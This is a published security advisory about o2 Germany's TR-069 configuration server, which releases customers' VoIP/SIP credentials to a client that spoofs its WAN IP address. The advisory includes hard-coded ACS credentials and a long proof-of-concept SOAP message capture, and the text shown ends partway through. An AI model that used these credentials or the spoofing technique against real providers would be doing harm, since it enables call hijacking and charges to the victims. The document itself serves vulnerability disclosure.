o2 DSL Auto Configuration Server Credential Disclosure
Posted on 08 January 2016
Advisory: o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials The o2 Auto Configuration Server (ACS) discloses VoIP/SIP credentials of arbitrary customers when receiving manipulated CWMP packets. These credentials can then be used by an attacker to register any VoIP number of the victim. This enables the attacker to place and receive calls on behalf of the attacked user. Details ======= Product: o2 DSL Auto Configuration Server Vulnerability Type: Information Disclosure Security Risk: high Vendor URL: https://o2online.de/ Vendor Status: fixed Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-005 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction ============ TR-069 (Technical Report 069) is a Broadband Forum technical specification entitled "CPE WAN Management Protocol" (CWMP). It defines an application layer protocol for remote management of end-user devices. (from Wikipedia) A more technical introduction to TR-069 can be found in a deck of slides which the Interoperability Laboratory at the University of New Hampshire has published on that topic [0]. More Details ============ The German Internet Service Provider o2 uses the TR-069 protocol for the provisioning of Customer Premises Equipment (CPE). Among other settings, VoIP/SIP credentials are transferred and VoIP telephony is set up. In our setup, an AVM FRITZ!Box 7490 was monitored during the initial autoconfiguration process. During that process, several CWMP messages are exchanged. These CWMP messages are transferred via HTTPS as SOAP requests and replies. The HTTPS connection is always established by the CPE which connects to the Auto Configuration Server (ACS). According to the CWMP, the CPE may do so on the occasion of several events, including, but not limited to: * BOOTSTRAP - first contact between CPE and ACS * BOOT - when CPE has rebooted * PERIODIC - after a period of time, defined by the ACS * CONNECTION REQUEST - ACS signals a connection request to the CPE via a second HTTP channel The "CONNECTION REQUEST" is the only event that can be triggered by the ACS. To do so, the ACS establishes an unencrypted HTTP connection to the CPE and authenticates via HTTP basic access authentication with a "ConnectionRequestUsername" and a "ConnectionRequestPassword". No further data is exchanged on that channel. Once the CPE has verified the credentials, it then initiates the real CWMP conversation by sending a CWMP-Inform message to the pre-defined ACS. The connection initiated by the CPE is TLS-secured and the CPE provides a username (ManagementServer.Username) and a password (ManagementServer.Password) to authenticate itself towards the ACS. A typical CWMP conversation (including the "CONNECTION REQUEST" event) is depicted below: .----------------Connection Request---------------. ] | | ] v | ] ----------. .-------- ]---> HTTP |Port| | | ] |8089| | | ] `----' | | ACS ] | | | | | |----. ] `----> | ---Inform------------------------> | | ] | <---InformResponse---------------- | | ] | | | ] | ---[empty]-----------------------> | | ] | <---SetParameterValues------------ | | ] | | | ] | ---SetParameterValuesResponse----> |Port| ]---> CWMP | <---SetParameterValues------------ | 443| ] (HTTPS) | | | ] CPE | [...] | | ] | | | ] | ---SetParameterValuesResponse----> | | ] | <---[empty]----------------------- | | ] | | | ] During our research, it was observed that the ACS URL as well as credentials for the initial connection to the ACS are hard-coded. On a stock AVM FRITZ!Box, running the firmware version 6.20, these can be found in the file ./providers/otwored/tr069.cfg which is part of the archive /etc/default.Fritz_Box_HW185/avm/providers-049.tar. For o2/Telefonica these credentials are: tr069cfg { enabled = yes; igd { DeviceInfo { ProvisioningCode = ""; } managementserver { url = "https://acs.o2online.de/nbbs/tr69"; username = "00040E-000000000000"; password = "o2acs"; URLAlreadyContacted = no; PeriodicInformEnable = yes; PeriodicInformInterval = 3600; } } FirmwareDownload { enabled = yes; enabled_converted = yes; } ACS_SSL { verify_server = yes; trusted_ca_file = "/etc/default/avm/root_ca.pem"; } Download_SSL { verify_server = yes; trusted_ca_file = "/etc/default/avm/root_ca.pem"; } } To ease the interaction with the ACS, a minimal TR-069 client was implemented. With this rogue client it was possible to simulate the behaviour of an AVM FRITZ!Box 7490 during the initial autoconfiguration process. Thus, in the following description, the word "CPE" may be replaced equally with "rogue client". After the CPE connects to the ACS (see [msg00] in section Proof of Concept), it gets configured to accept new credentials for incoming connection requests: * InternetGatewayDevice.ManagementServer.ConnectionRequestUsername * InternetGatewayDevice.ManagementServer.ConnectionRequestPassword (see [msg03]) The CPE is now capable of receiving connection requests from the ACS. After several seconds, the ACS initiates a connection request and the CPE starts a CWMP conversation (see [msg06]). During that conversation, the ACS (ACS A) provides a new ACS URL (ACS B) together with a new set of login credentials for ACS B: * InternetGatewayDevice.ManagementServer.URL * InternetGatewayDevice.ManagementServer.Username * InternetGatewayDevice.ManagementServer.Password * InternetGatewayDevice.ManagementServer.ConnectionRequestUsername * InternetGatewayDevice.ManagementServer.ConnectionRequestPassword (see [msg09]) Finally, the CPE is rebooted. From that point in time, all CWMP conversation is directed to ACS B. On the occasion of the "BOOT" event, the CPE connects to ACS B (see [msg12]) and receives the following settings: * InternetGatewayDevice.ManagementServer.PeriodicInformEnable * InternetGatewayDevice.ManagementServer.PeriodicInformInterval * InternetGatewayDevice.ManagementServer.PeriodicInformTime (see [msg15]) After several seconds, again, the CPE receives a connection request. It connects to ACS B again (see [msg18]) and receives the VoIP credentials for all telephone numbers, that are assigned to the customer: * InternetGatewayDevice.Services.VoiceService.1. VoiceProfile.1.Line.1.DirectoryNumber * InternetGatewayDevice.Services.VoiceService.1. VoiceProfile.1.Line.1.SIP.AuthUserName * InternetGatewayDevice.Services.VoiceService.1. VoiceProfile.1.Line.1.SIP.AuthPassword * InternetGatewayDevice.Services.VoiceService.1. VoiceProfile.1.Line.1.SIP.RegistrarServer * InternetGatewayDevice.Services.VoiceService.1. VoiceProfile.1.Line.1.SIP.OutboundProxy (see [msg23]) The first digits of the AuthPassword are taken from the phone number. In summary, the CPE has received VoIP credentials while it only supplied hard-coded login credentials for ACS A. As a result, the ACS must have identified the CPE by the WAN IP address. It was further determined that the ACS relies on the WAN/IPv4 address, which is specified as the parameter * InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1. WANIPConnection.1.ExternalIPAddress in the CWMP-Inform messages (see [msg00,06,12,18]). These CWMP-Inform messages can be manipulated by an attacker and therefore may contain arbitrary WAN IP addresses. If an attacker sends such spoofed CWMP-Inform messages during the whole two-step auto-provisioning process, the ACS returns VoIP credentials which are assigned to the IP address specified by the attacker. Additionally, any VoIP number issued by o2 may be registered from any o2 DSL account. Even if the number is already registered by the legit customer's CPE, an attacker may register the number a second time. Incoming calls will be directed to both clients and may be answered by either of them. Furthermore, it allows an attacker to place and receive phone calls on behalf of any other customer. In consequence, the victim will be charged with any costs resulting from the abuse. Proof of Concept ================ As a proof of concept, the CWMP conversation that was captured during the autoprovisioning of an AVM FRITZ!Box 7490 (Firmware 6.20) is given below. Each message is the body of an HTTPS POST request (to the ACS) or an HTTPS POST reply (from the ACS). Some messages have been wrapped to obtain better readability. Communication with ACS A: ------------------------------------------------------------------------ [msg00] CPE -> ACS A: --------------------- <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0"> <soap:Header> <cwmp:ID soap:mustUnderstand="1">100</cwmp:ID> </soap:Header> <soap:Body> <cwmp:Inform> <DeviceId> <Manufacturer>AVM</Manufacturer> <OUI>00040E</OUI> <ProductClass>FRITZ!Box</ProductClass> <SerialNumber>0896D776FAA2</SerialNumber> </DeviceId> <Event soap-enc:arrayType="cwmp:EventStruct[2]"> <EventStruct> <EventCode>1 BOOT</EventCode> <CommandKey/> </EventStruct> <EventStruct> <EventCode>0 BOOTSTRAP</EventCode> <CommandKey/> </EventStruct> </Event> <MaxEnvelopes>1</MaxEnvelopes> <CurrentTime>2014-09-08T18:27:32+02:00</CurrentTime> <RetryCount>0</RetryCount> <ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]"> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceSummary</Name> <Value xsi:type="xsd:string"> InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1, ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2, DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1, Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1, FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1, VolumeConfig:1) </Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name> <Value xsi:type="xsd:string">FRITZ!Box 7490</Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name> <Value xsi:type="xsd:string">113.06.20</Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name> <Value xsi:type="xsd:string">1.0</Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name> <Value xsi:type="xsd:string"/> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer.ParameterKey </Name> <Value xsi:type="xsd:string"/> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer.ConnectionRequestURL </Name> <Value xsi:type="xsd:string"> http://78.48.x.x:8089/869f7018 </Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1. WANIPConnection.1.ExternalIPAddress </Name> <Value xsi:type="xsd:string">78.48.x.x</Value> </ParameterValueStruct> </ParameterList> </cwmp:Inform> </soap:Body> </soap:Envelope> [msg01] CPE <- ACS A: --------------------- <?xml version="1.0"?> <soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soapenv:Header> <cwmp:ID soapenv:mustUnderstand="1">100</cwmp:ID> </soapenv:Header> <soapenv:Body> <cwmp:InformResponse> <MaxEnvelopes>1</MaxEnvelopes> </cwmp:InformResponse> </soapenv:Body> </soapenv:Envelope> [msg02] CPE -> ACS A: --------------------- [empty] [msg03] CPE <- ACS A: --------------------- <?xml version="1.0"?> <soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soapenv:Header> <cwmp:ID soapenv:mustUnderstand="1">null0</cwmp:ID> </soapenv:Header> <soapenv:Body> <cwmp:SetParameterValues> <ParameterList soap:arrayType="cwmp:ParameterValueStruct[4]"> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer.PeriodicInformEnable </Name> <Value xsi:type="xsd:boolean">1</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer. ConnectionRequestUsername </Name> <Value xsi:type="xsd:string">0896D776FAA2</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer. ConnectionRequestPassword</Name> <Value xsi:type="xsd:string"> 57d29f69eca7b5ca484e4644bf9720 </Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer. PeriodicInformInterval </Name> <Value xsi:type="xsd:unsignedInt">200</Value> </ParameterValueStruct> </ParameterList> <ParameterKey>null</ParameterKey> </cwmp:SetParameterValues> </soapenv:Body> </soapenv:Envelope> [msg04] CPE -> ACS A: --------------------- <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0"> <soap:Header> <cwmp:ID soap:mustUnderstand="1">null0</cwmp:ID> </soap:Header> <soap:Body> <cwmp:SetParameterValuesResponse> <Status>0</Status> </cwmp:SetParameterValuesResponse> </soap:Body> </soap:Envelope> [msg05] CPE <- ACS A: --------------------- [empty] [msg06] CPE -> ACS A: --------------------- <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0"> <soap:Header> <cwmp:ID soap:mustUnderstand="1">null0</cwmp:ID> </soap:Header> <soap:Body> <cwmp:Inform> <DeviceId> <Manufacturer>AVM</Manufacturer> <OUI>00040E</OUI> <ProductClass>FRITZ!Box</ProductClass> <SerialNumber>0896D776FAA2</SerialNumber> </DeviceId> <Event soap-enc:arrayType="cwmp:EventStruct[1]"> <EventStruct> <EventCode>6 CONNECTION REQUEST</EventCode> <CommandKey/> </EventStruct> </Event> <MaxEnvelopes>1</MaxEnvelopes> <CurrentTime>2014-09-08T18:27:34+02:00</CurrentTime> <RetryCount>0</RetryCount> <ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]"> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceSummary</Name> <Value xsi:type="xsd:string"> InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1, ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2, DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1, Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1, FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1, VolumeConfig:1) </Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name> <Value xsi:type="xsd:string">FRITZ!Box 7490</Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name> <Value xsi:type="xsd:string">113.06.20</Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name> <Value xsi:type="xsd:string">1.0</Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name> <Value xsi:type="xsd:string"/> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer.ParameterKey </Name> <Value xsi:type="xsd:string">null</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer.ConnectionRequestURL </Name> <Value xsi:type="xsd:string"> http://78.48.x.x:8089/869f7018 </Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1. WANIPConnection.1.ExternalIPAddress </Name> <Value xsi:type="xsd:string">78.48.x.x</Value> </ParameterValueStruct> </ParameterList> </cwmp:Inform> </soap:Body> </soap:Envelope> [msg07] CPE <- ACS A: --------------------- <?xml version="1.0"?> <soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soapenv:Header> <cwmp:ID soapenv:mustUnderstand="1">null0</cwmp:ID> </soapenv:Header> <soapenv:Body> <cwmp:InformResponse> <MaxEnvelopes>1</MaxEnvelopes> </cwmp:InformResponse> </soapenv:Body> </soapenv:Envelope> [msg08] CPE -> ACS A: --------------------- [empty] [msg09] CPE <- ACS A: --------------------- <?xml version="1.0"?> <soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soapenv:Header> <cwmp:ID soapenv:mustUnderstand="1">393158460</cwmp:ID> </soapenv:Header> <soapenv:Body> <cwmp:SetParameterValues> <ParameterList soap:arrayType="cwmp:ParameterValueStruct[5]"> <ParameterValueStruct> <Name>InternetGatewayDevice.ManagementServer.URL</Name> <Value xsi:type="xsd:string"> https://hdm.o2online.de:443/cwmpWeb/CPEMgt </Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.ManagementServer.Username</Name> <Value xsi:type="xsd:string">0896D776FAA2</Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.ManagementServer.Password</Name> <Value xsi:type="xsd:string">1410193655111a</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer. ConnectionRequestUsername </Name> <Value xsi:type="xsd:string">0896D776FAA2</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer. ConnectionRequestPassword </Name> <Value xsi:type="xsd:string">1410193655111a</Value> </ParameterValueStruct> </ParameterList> <ParameterKey>39315846</ParameterKey> </cwmp:SetParameterValues> </soapenv:Body> </soapenv:Envelope> [msg10] CPE -> ACS A: --------------------- <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0"> <soap:Header> <cwmp:ID soap:mustUnderstand="1">393158460</cwmp:ID> </soap:Header> <soap:Body> <cwmp:SetParameterValuesResponse> <Status>0</Status> </cwmp:SetParameterValuesResponse> </soap:Body> </soap:Envelope> [msg11] CPE <- ACS A: --------------------- initializeSession:null ------------------------------------------------------------------------ Communication with ACS B: ------------------------------------------------------------------------ [msg12] CPE -> ACS B: --------------------- <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0"> <soap:Header> <cwmp:ID soap:mustUnderstand="1">393158460</cwmp:ID> </soap:Header> <soap:Body> <cwmp:Inform> <DeviceId> <Manufacturer>AVM</Manufacturer> <OUI>00040E</OUI> <ProductClass>FRITZ!Box</ProductClass> <SerialNumber>0896D776FAA2</SerialNumber> </DeviceId> <Event soap-enc:arrayType="cwmp:EventStruct[2]"> <EventStruct> <EventCode>1 BOOT</EventCode> <CommandKey/> </EventStruct> <EventStruct> <EventCode>0 BOOTSTRAP</EventCode> <CommandKey/> </EventStruct> </Event> <MaxEnvelopes>1</MaxEnvelopes> <CurrentTime>2014-09-08T18:27:35+02:00</CurrentTime> <RetryCount>0</RetryCount> <ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]"> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceSummary</Name> <Value xsi:type="xsd:string"> InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1, ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2, DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1, Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1, FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1, VolumeConfig:1) </Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name> <Value xsi:type="xsd:string">FRITZ!Box 7490</Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name> <Value xsi:type="xsd:string">113.06.20</Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name> <Value xsi:type="xsd:string">1.0</Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name> <Value xsi:type="xsd:string"/> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer.ParameterKey </Name> <Value xsi:type="xsd:string">39315846</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer.ConnectionRequestURL </Name> <Value xsi:type="xsd:string"> http://78.48.x.x:8089/869f7018 </Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1. WANIPConnection.1.ExternalIPAddress </Name> <Value xsi:type="xsd:string">78.48.x.x</Value> </ParameterValueStruct> </ParameterList> </cwmp:Inform> </soap:Body> </soap:Envelope> [msg13] CPE <- ACS B: --------------------- <?xml version="1.0"?> <soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soapenv:Header> <cwmp:ID soapenv:mustUnderstand="1">393158460</cwmp:ID> </soapenv:Header> <soapenv:Body> <cwmp:InformResponse> <MaxEnvelopes>1</MaxEnvelopes> </cwmp:InformResponse> </soapenv:Body> </soapenv:Envelope> [msg14] CPE -> ACS B: --------------------- [empty] [msg15] CPE <- ACS B: --------------------- <?xml version="1.0"?> <soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soapenv:Header> <cwmp:ID soapenv:mustUnderstand="1">393158490</cwmp:ID> </soapenv:Header> <soapenv:Body> <cwmp:SetParameterValues> <ParameterList soap:arrayType="cwmp:ParameterValueStruct[3]"> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer.PeriodicInformEnable </Name> <Value xsi:type="xsd:boolean">1</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer. PeriodicInformInterval </Name> <Value xsi:type="xsd:unsignedInt">38888</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer.PeriodicInformTime </Name> <Value xsi:type="xsd:dateTime"> 2014-09-08T10:49:21+1:00 </Value> </ParameterValueStruct> </ParameterList> <ParameterKey>39315849</ParameterKey> </cwmp:SetParameterValues> </soapenv:Body> </soapenv:Envelope> [msg16] CPE -> ACS B: --------------------- <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0"> <soap:Header> <cwmp:ID soap:mustUnderstand="1">393158490</cwmp:ID> </soap:Header> <soap:Body> <cwmp:SetParameterValuesResponse> <Status>0</Status> </cwmp:SetParameterValuesResponse> </soap:Body> </soap:Envelope> [msg17] CPE <- ACS B: --------------------- [empty] [msg18] CPE -> ACS B: --------------------- <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0"> <soap:Header> <cwmp:ID soap:mustUnderstand="1">393158490</cwmp:ID> </soap:Header> <soap:Body> <cwmp:Inform> <DeviceId> <Manufacturer>AVM</Manufacturer> <OUI>00040E</OUI> <ProductClass>FRITZ!Box</ProductClass> <SerialNumber>0896D776FAA2</SerialNumber> </DeviceId> <Event soap-enc:arrayType="cwmp:EventStruct[1]"> <EventStruct> <EventCode>6 CONNECTION REQUEST</EventCode> <CommandKey/> </EventStruct> </Event> <MaxEnvelopes>1</MaxEnvelopes> <CurrentTime>2014-09-08T18:27:36+02:00</CurrentTime> <RetryCount>0</RetryCount> <ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]"> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceSummary</Name> <Value xsi:type="xsd:string"> InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1, ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2, DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1, Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1, FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1, VolumeConfig:1) </Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name> <Value xsi:type="xsd:string">FRITZ!Box 7490</Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name> <Value xsi:type="xsd:string">113.06.20</Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name> <Value xsi:type="xsd:string">1.0</Value> </ParameterValueStruct> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name> <Value xsi:type="xsd:string"/> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer.ParameterKey </Name> <Value xsi:type="xsd:string">39315849</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.ManagementServer.ConnectionRequestURL </Name> <Value xsi:type="xsd:string"> http://78.48.x.x:8089/869f7018 </Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1. WANIPConnection.1.ExternalIPAddress </Name> <Value xsi:type="xsd:string">78.48.x.x</Value> </ParameterValueStruct> </ParameterList> </cwmp:Inform> </soap:Body> </soap:Envelope> [msg19] CPE <- ACS B: --------------------- <?xml version="1.0"?> <soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soapenv:Header> <cwmp:ID soapenv:mustUnderstand="1">393158490</cwmp:ID> </soapenv:Header> <soapenv:Body> <cwmp:InformResponse> <MaxEnvelopes>1</MaxEnvelopes> </cwmp:InformResponse> </soapenv:Body> </soapenv:Envelope> [msg20] CPE -> ACS B: --------------------- [empty] [msg21] CPE <- ACS B: --------------------- <?xml version="1.0"?> <soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soapenv:Header> <cwmp:ID soapenv:mustUnderstand="1">393158500</cwmp:ID> </soapenv:Header> <soapenv:Body> <cwmp:SetParameterValues> <ParameterList soap:arrayType="cwmp:ParameterValueStruct[2]"> <ParameterValueStruct> <Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name> <Value xsi:type="xsd:string"> 20140908xxxxxx-0896D776FAA2-78.48.x.x </Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.Services.VoiceService.1.Capabilities. X_AVM-DE_UsePSTN </Name> <Value xsi:type="xsd:boolean">0</Value> </ParameterValueStruct> </ParameterList> <ParameterKey>39315850</ParameterKey> </cwmp:SetParameterValues> </soapenv:Body> </soapenv:Envelope> [msg22] CPE -> ACS B: --------------------- <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0"> <soap:Header> <cwmp:ID soap:mustUnderstand="1">393158500</cwmp:ID> </soap:Header> <soap:Body> <cwmp:SetParameterValuesResponse> <Status>0</Status> </cwmp:SetParameterValuesResponse> </soap:Body> </soap:Envelope> [msg23] CPE <- ACS B: --------------------- <?xml version="1.0"?> <soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soapenv:Header> <cwmp:ID soapenv:mustUnderstand="1">393158501</cwmp:ID> </soapenv:Header> <soapenv:Body> <cwmp:SetParameterValues> <ParameterList soap:arrayType="cwmp:ParameterValueStruct[13]"> <ParameterValueStruct> <Name> InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Enable </Name> <Value xsi:type="xsd:string">Enabled</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.Enable </Name> <Value xsi:type="xsd:string">Enabled</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> 